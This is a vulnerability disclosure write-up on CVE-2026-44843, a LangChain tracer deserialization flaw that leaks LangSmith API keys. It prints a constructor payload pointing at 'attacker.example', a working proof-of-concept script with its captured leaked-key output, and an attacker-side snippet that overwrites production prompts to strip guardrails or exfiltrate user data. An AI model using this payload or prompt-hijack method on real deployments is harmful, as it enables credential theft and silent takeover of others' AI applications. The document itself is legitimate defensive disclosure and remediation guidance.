By Dewank Pant and Shruti Lohani
Some vulnerabilities only become obvious when you stop looking at the model and start looking at the machinery around it.
The LLM was not the problem here. The prompt was not the problem either. The interesting bug was in the framework plumbing that sits around modern AI applications: tracing, memory, serialization, streaming, runtime metadata, and object revival.
For us, that piece of plumbing turned out to be the LangChain tracer.
What we found, and what is now tracked as CVE-2026-44843, is a chain that starts with a single chat message and ends with the attacker holding admin access to the victim application's LangSmith workspace, including write access to the production prompts that LangChain applications fetch at runtime.
In the deployment shape we analyzed, those conditions lined up naturally: a public LangServe-style endpoint, structured input preserved into run data, and affected runtime paths such as RunnableWithMessageHistory, astream_log, or astream_events(version="v1"). No authentication. No user interaction. No prior access.
This is the story of how we found the chain, how the gadget worked, and why the impact was bigger than a simple leaked tracing key. The issue was patched in langchain-core 1.3.3 and 0.3.85. If you run an older version in a public-facing LangChain or LangServe-style application, upgrade first.
Where we started
We were looking at how modern AI applications handle untrusted input.
Not just the prompt itself. Everyone looks at the prompt.
We were interested in the layers around the prompt: tracers, loggers, memory backends, streaming events, serialized objects, and runtime metadata. These components sit on the request path, but they are often treated as internal framework machinery rather than security boundaries.
That is exactly what made them interesting.
AI applications move a lot of structured data around. A single request can become a user message, a model input, a run object, a trace, a streaming patch, a memory entry, and a stored artifact. Somewhere along that path, data can change meaning.
A value that begins as user input can later be treated as framework state. That led us to the question that shaped the research:
Can attacker-controlled runtime data ever become a trusted LangChain object?
LangChain was a natural place to look. langchain-core is the foundational runtime under LangChain, LangGraph, and LangServe. LangSmith is the common observability and prompt-management layer around that ecosystem. Two defaults converging on the same request path is exactly the kind of place where a quiet bug ends up reaching a lot of production deployments at once.
So we started looking at the tracer.
The thing that did not look right
In langchain-core, the tracer is responsible for capturing the inputs and outputs of every run. When the run finishes, the tracer rehydrates those inputs and outputs from their stored form.
The path that caught our attention appeared in history and streaming-related logic, including _exit_history, _aexit_history, and related call sites used by astream_log and astream_events.
Six call sites in total. All six used the same risky pattern:
inputs = load(run.inputs, allowed_objects="all")
output_val = load(run.outputs, allowed_objects="all")

load() is LangChain's deserializer. The allowed_objects="all" argument tells it that any class registered in LangChain's serializable mapping is fair game to instantiate.
That stopped us.
Not because this was arbitrary Python deserialization. It was not. LangChain's deserializer is narrower than pickle.loads. It will only revive classes that the project has explicitly registered. But "explicitly registered" turns out to mean 94 classes as of langchain-core 1.3.1, and the question we kept coming back to was:
Are all registered LangChain-serializable objects safe to construct with attacker-controlled arguments in this runtime context?
If even one registered class performs meaningful work during construction, then a constructor-shaped dictionary in the wrong runtime path may be enough to make the server perform that work under its own identity.
The bridge from "user input" to "deserializer"
The next question was whether run.inputs could actually be influenced by an attacker.
Tracers feel like internal infrastructure. The mental model most developers carry is that run.inputs is something the framework constructs from sanitized data, not something a user types. So we went looking for the path between a chat message and run.inputs.
In affected paths, structured input could be preserved as runtime data.
A simplified version of the relevant behavior looked like this:
def _get_chain_inputs(self, inputs: Any) -> Any:
    if self._schema_format in {"original", "original+chat"}:
        return inputs if isinstance(inputs, dict) else {"input": inputs}

If inputs was already a dictionary, it could be returned as-is. No escaping. No canonicalization. No hard separation between user-originated structure and framework-originated structure.
Which means that if a user sends a chat message that happens to be a dict, that dict ends up on run.inputs exactly as the user wrote it. That mattered because LangChain-serialized constructor objects have a recognizable shape:
{
"lc": 1,
"type": "constructor",
"id": ["langchain", "schema", "runnable", "SomeClass"],
"kwargs": { "...": "..." }
}

If this remains inert data, nothing interesting happens.
If it reaches a broad load() call, the framework may treat it as a construction request. The next step was to find a class on the allowlist that did something interesting in its constructor.
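To make the mechanics concrete with a harmless registered class first (a benign sketch; load()'s exact defaults vary across langchain-core versions):

# A constructor-shaped dict becomes a live object of a registered class.
from langchain_core.load import load

revived = load({
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "schema", "messages", "AIMessage"],
    "kwargs": {"content": "hello"},
})
print(type(revived).__name__)  # AIMessage: inert data became a live object

With a data container like AIMessage, revival is harmless. The question was whether all of the registered classes stayed harmless.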
The class we did not expect to find
We started reading through the serializable mapping. Many entries were boring in the best possible way: message types, document types, and simple data containers.
Then we hit HubRunnable.
The interesting part was its initialization behavior. In simplified form, the constructor path looked like this:
def __init__(self, owner_repo_commit, *, api_url=None, api_key=None, **kwargs):
    from langchain_classic.hub import pull
    pulled = pull(owner_repo_commit, api_url=api_url, api_key=api_key)
    ...

That is not just object construction.
That is object construction with a network side effect!
HubRunnable makes an HTTP request during construction. It calls pull(), which constructs LangSmithClient(api_url=api_url, api_key=api_key) and issues a GET to <api_url>/commits/<owner>/<repo>/latest.
That is already interesting. An attacker who controls api_url controls the destination of an outbound HTTP request from the server. Classic SSRF attack.
But the moment that escalated the severity chain was when we read the LangSmith client's auth code.
The fallback that gives away the key
When LangSmithClient is constructed with api_key=None, it does not error out, and it does not skip authentication. It looks up the key from the environment instead, in this order: LANGSMITH_API_KEY, then LANGCHAIN_API_KEY.
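In simplified form, the lookup behaves like this (a sketch of the behavior we observed, not the real client code):

import os

def _resolve_api_key(api_key):
    # An explicit key wins; otherwise fall back to the process environment.
    if api_key is not None:
        return api_key
    return os.environ.get("LANGSMITH_API_KEY") or os.environ.get("LANGCHAIN_API_KEY")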
That is normal client behavior in trusted application code.
Inside this chain, it becomes the vulnerability.
The attacker sends a chat message containing a serialized HubRunnable constructor dict. The attacker controls api_url. The attacker deliberately omits api_key. The tracer hits load(), instantiates HubRunnable, which calls pull(), which constructs a LangSmith client, which reads LANGSMITH_API_KEY from the server's own environment, and sends it to the attacker's URL in an x-api-key header.
The chain becomes:
attacker sends structured payload
-> payload survives as runtime data
-> runtime path calls broad load()
-> HubRunnable is revived
-> HubRunnable triggers LangSmith client behavior
-> client reads API key from server environment
-> client sends request to attacker-controlled URL
-> API key appears in an x-api-key header

The exfiltration request fires during object revival. That timing matters, as the application's normal output filtering, response lifecycle, or exception handling does not get a meaningful chance to stop it. By the time the constructor path fails or raises, the credential has already been sent.
The payload:
{
"lc": 1,
"type": "constructor",
"id": ["langchain", "schema", "runnable", "HubRunnable"],
"kwargs": {
"owner_repo_commit": "a/b",
"api_url": "http://attacker.example/"
}
}

That is a simplified payload. The key detail is that api_key is omitted. That omission causes the client path to fall back to the victim server environment, leading to remote unauthenticated credential exfiltration.
Proving it
We wrote a small PoC. It runs a one-shot listener on 127.0.0.1:19996, builds a minimal RunnableWithMessageHistory-wrapped chain, drops a sentinel LANGSMITH_API_KEY into the environment, and sends the payload above as a chat input.
import os, socket, threading, time, importlib

# Sentinel credential: if it appears on the wire, the leak is proven.
SENTINEL_KEY = "lsv2_pt_SENTINEL_LEAK_0xDEADBEEF"
os.environ["LANGSMITH_API_KEY"] = SENTINEL_KEY
os.environ["LANGCHAIN_API_KEY"] = SENTINEL_KEY
os.environ["LANGSMITH_TRACING"] = "false"

captured = {"bytes": b""}

# One-shot HTTP listener standing in for the attacker's server: capture the
# request headers, answer with a bare 500, and stop.
def listener():
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 19996)); s.listen(1); s.settimeout(10)
    conn, _ = s.accept(); conn.settimeout(2); buf = b""
    while b"\r\n\r\n" not in buf:
        try:
            chunk = conn.recv(8192)
            if not chunk: break
            buf += chunk
        except socket.timeout: break
    captured["bytes"] = buf
    conn.sendall(b"HTTP/1.1 500 x\r\nContent-Length: 0\r\n\r\n")
    conn.close()

threading.Thread(target=listener, daemon=True).start()
time.sleep(0.2)

# Register HubRunnable in the loader's mapping so load() can revive it in this
# minimal environment (a full install registers it via langchain_classic).
L = importlib.import_module("langchain_core.load.load")
L.DEFAULT_NAMESPACES.append("langchain_classic")
L.ALL_SERIALIZABLE_MAPPINGS[("langchain", "schema", "runnable", "HubRunnable")] = (
    "langchain_classic", "runnables", "hub", "HubRunnable",
)

from langchain_core.runnables import RunnableLambda, RunnableWithMessageHistory
from langchain_core.chat_history import InMemoryChatMessageHistory
from langchain_core.messages import AIMessage

# Minimal chain wrapped in RunnableWithMessageHistory, one of the affected
# runtime paths whose tracer calls load(..., allowed_objects="all").
chain = RunnableWithMessageHistory(
    RunnableLambda(lambda x: AIMessage(content="ok")),
    lambda sid: InMemoryChatMessageHistory(),
)

# The attacker-controlled constructor dict. api_key is deliberately omitted so
# the LangSmith client falls back to the server's environment.
payload = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "schema", "runnable", "HubRunnable"],
    "kwargs": {
        "owner_repo_commit": "a/b",
        "api_url": "http://127.0.0.1:19996",
    },
}

try:
    chain.invoke([payload], config={"configurable": {"session_id": "poc"}})
except Exception:
    pass  # HubRunnable raises after the exfil; the key is already gone.

time.sleep(1)
out = captured["bytes"].decode("utf-8", errors="replace")
print(out[:600])
print("LEAKED" if SENTINEL_KEY in out else "no leak")

The first time we ran it, the listener printed:
GET /commits/a/b/latest HTTP/1.1
Host: 127.0.0.1:19996
User-Agent: langsmith-py/0.7.33
x-api-key: lsv2_pt_SENTINEL_LEAK_0xDEADBEEF
LEAKED

Tested in a local affected environment with a sentinel key, after coordinated disclosure and patch release.
There was that small moment of "oh."
We thought it ended there. It did not.
At first, stealing a tracing key sounds bounded. Bad, but bounded. Rotate the key, review traces, move on.
That is how we initially scoped the impact. Then we read the LangSmith documentation on permissions, and the chain got worse.
The stolen token is not merely a tracing credential. A LANGSMITH_API_KEY carries authority across the entire LangSmith workspace: read access to all trace data, write access to the Prompt Hub, and delete access on datasets, projects, and prompts. In Developer organizations, every user is assigned Organization Admin by default.
LangChain applications routinely call hub.pull("user/prompt_name") at runtime to fetch their production system prompts. If those prompts live in the compromised workspace (and most teams using LangChain plus LangSmith do exactly that), the attacker can issue a single API call and silently overwrite the prompt body. From that point forward, every request the victim application serves runs against an attacker-controlled prompt.
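To be concrete about how cheap that overwrite is, here is a hedged attacker-side sketch, assuming the classic langchain.hub API and an illustrative prompt name:

from langchain import hub
from langchain_core.prompts import ChatPromptTemplate

STOLEN_KEY = "lsv2_pt_stolen_value"  # placeholder for the exfiltrated credential

# Illustrative only: one push call silently replaces the production prompt.
malicious = ChatPromptTemplate.from_messages(
    [("system", "attacker-controlled instructions")]
)
hub.push("victim-team/production-prompt", malicious, api_key=STOLEN_KEY)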
The attacker can rewrite system instructions. They can change tool-use rules. They can weaken or remove guardrails. They can inject exfiltration payloads into the model's instructions so user data leaks on every response. They can simply make the model lie about specific topics to specific users.
There is no entry in the application's own logs that distinguishes a hijacked prompt from a legitimate update.
That is why we treated the exploit chain as more severe than a simple outbound request bug.
The credential was the entry point.
The prompt store was the persistence layer.
HubRunnable was the live gadget.

The surface was wider
HubRunnable was the class we proved end to end. But the primitive exposed by the tracer was not limited to one class.
At the time of our submission, SERIALIZABLE_MAPPING contained 94 registered classes. The tracer's load(..., allowed_objects="all") call made every one of them relevant if attacker-controlled data could reach the loader.
Any class whose __init__, model_post_init, or Pydantic @model_validator performs side effects under the server's identity, including network calls, credential lookups, or client construction, was a potential gadget.
HubRunnable was the live counterexample.
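One way to reason about the remaining surface is to enumerate the mapping and review every entry's construction path. A rough audit sketch (the module layout varies by langchain-core version):

# List each registered lc id and the class it maps to, so a reviewer can
# check every __init__, model_post_init, and @model_validator for side effects.
from langchain_core.load.mapping import SERIALIZABLE_MAPPING

for lc_id, import_path in sorted(SERIALIZABLE_MAPPING.items()):
    print(".".join(lc_id), "->", ".".join(import_path))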
The important fix was therefore not "block this one payload."
The important fix was to close the sink by ensuring broad object revival is not applied implicitly to attacker-controllable runtime payloads.
The broader issue: data becoming behavior
The most important thing CVE-2026-44843 points to is a design principle that gets violated quietly across a lot of modern AI stacks.
In AI frameworks, the boundary between data and behavior is a security boundary.
A chat message is not always just text. A trace is not always just observability data. A memory entry is not always passive history. A serialized object is not always inert configuration. A prompt artifact is not always just content.
In a modern LangChain application, all of those things can influence execution: model context, tool calls, prompt construction, evaluation pipelines, and future user interactions.
So the security question for AI systems is not only "can the attacker execute code?"
It is also: "can the attacker make the framework reinterpret data as trusted control?"
CVE-2026-44843 is a concrete example of exactly that. The attacker never executed arbitrary code. They sent a structured dictionary that the framework later decided to treat as a constructor manifest for a trusted class. That class then did trusted work with attacker-supplied arguments.
Reporting and what got fixed
We reported the chain to the LangChain security team in April 2026 through the standard GitHub Security Advisory process. They triaged and assigned CVE-2026-44843, and shipped fixes in langchain-core 1.3.3 and 0.3.85. The full published advisory is GHSA-pjwx-r37v-7724.
The patch narrows the deserialization sink so broad object revival is not implicitly applied to attacker-controllable runtime payloads. The advisory also deprecates the affected older runtime APIs:
RunnableWithMessageHistory
astream_log()
astream_events(version="v1")
What to do if you ran an affected version
Upgrade. The fixed releases are langchain-core 1.3.3 on the 1.x line and langchain-core 0.3.85 on the 0.3.x line.
Beyond the upgrade, three things are worth doing if you operated a public-facing LangServe-shaped endpoint on an affected version at any point during the exposure window.
Rotate LangSmith and LangChain credentials
If your application exposed an affected public endpoint and used LANGSMITH_API_KEY or LANGCHAIN_API_KEY, treat those credentials as potentially exposed.
The exfiltration request is fast and may not leave obvious evidence in application logs.
Audit Prompt Hub artifacts
If your application uses hub.pull() or otherwise fetches prompts or runnable artifacts from LangSmith at runtime, verify that those artifacts have not been modified unexpectedly.
Compare them against a version-controlled source of truth outside the workspace.
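A minimal drift check, sketched with an assumed prompt name and a digest you keep in git (the hub also supports pinning a specific commit, e.g. hub.pull("owner/repo:commit-hash")):

from hashlib import sha256
from langchain import hub
from langchain_core.load import dumps

# sha256 of the known-good serialized prompt, stored in version control.
EXPECTED_DIGEST = "0123abcd"  # placeholder

prompt = hub.pull("myteam/production-prompt")  # illustrative artifact name
digest = sha256(dumps(prompt).encode("utf-8")).hexdigest()
if digest != EXPECTED_DIGEST:
    raise RuntimeError("Prompt Hub artifact drifted from the pinned copy")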
Validate request bodies into inert schemas
Do not allow arbitrary nested dictionaries from users to survive into framework runtime data unless the application explicitly needs that structure.
If a field should be a string, coerce it to a string.
If a request should match a fixed schema, reject extra structure.
Do not pass user-controlled data to load() or loads().
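A minimal sketch with Pydantic (field names are illustrative):

from pydantic import BaseModel, ConfigDict, ValidationError

class ChatRequest(BaseModel):
    model_config = ConfigDict(extra="forbid")  # reject unexpected fields
    message: str  # nested structure here fails validation instead of passing through

# A constructor-shaped dict never reaches run.inputs:
try:
    ChatRequest.model_validate({"message": {"lc": 1, "type": "constructor"}})
except ValidationError:
    pass  # rejected at the boundary, as intended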
This writeup describes a vulnerability that is patched at the time of publication. The PoC is provided for defensive verification on affected, unpatched test environments only.